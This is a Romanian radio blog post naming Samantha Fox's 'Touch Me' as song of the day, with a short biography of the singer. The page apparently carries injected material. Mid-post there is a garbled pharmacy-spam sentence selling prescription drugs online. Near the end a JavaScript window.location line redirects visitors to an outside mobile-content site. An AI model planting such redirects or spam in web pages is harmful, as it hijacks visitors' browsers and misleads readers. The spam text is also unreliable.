Melodia zilei de 01 Februarie 2014

 

Samantha Fox – “Touch me“

Samantha Fox, numele ei complet este Samantha Karen Fox. S-a nascut la data de 15 aprilie 1966 in Mile End, Londra, Anglia. Samanta este un model si o cantareata pop-dance. La sfarsitul anilor 1980, Fox a inceput o cariera de succes cantand,producatoare de trei albume in trei ani ( 1986 – 1988 ), si a lucrat cu producatori notabili, de exemplu Stock Aitken Waterman and Full Force.

Samantha Fox a fost una dintre artistele care au influentat puternic muzica rock a anilor ’80 & ’90 ale secolului al XX-lea. Samantha Karen Fox s-a lansat la varsta de 16 ani cu piesa “Touch Me (I Want Your Body)” care a devenit “number 1” in Canada, Norvegia, Africa de Sud, Elvetia, si Suedia, fiind totodata si piesa care o impune in galeria marilor nume pe scena muzicala mondiala. Prima aparitie televizata a venit in 1976, la varsta de 10 ani, intr-o emisiune-joc de la BBC, intitulat No Way Out.

Samantha_Fox

Faptul ca Samantha Fox era o femeie frumoasa a fost dovedit si de cariera ei in modeling in care a fost lansata de mama sa Carole Fox care era fotograf si ii face cateva poze pe care le trimite la “Sunday People” pentru rubrica “Page Three Girl” unde este remarcata de multe agentii de modeling. Succesul de care s-a bucurat artista in anul 1986 a facut ca acasta sa fie imaginea jocului “Samantha Fox Strip Poker”.

Release of buy mobic online no prescription, and of active components of lexapro with buy Indocin online , or with sterilizatsi-onno-distillation installation. samantha-fox-ii-912413l-poza

O melodie frumoasa semnata de Samantha Fox – “Touch me“, este aleasa melodia zilei de 01 Februarie 2014 la Radio Enigma Romania.

O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

samantha-fox-ii-287710l-214x0-wtm-522caa94

Haideti sa il ascultam si noi.

O zi frumoasa sa ai alaturi de cei dragi tie,
alaturi de Radio Enigma Romania -Vocea gandurilor tale.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *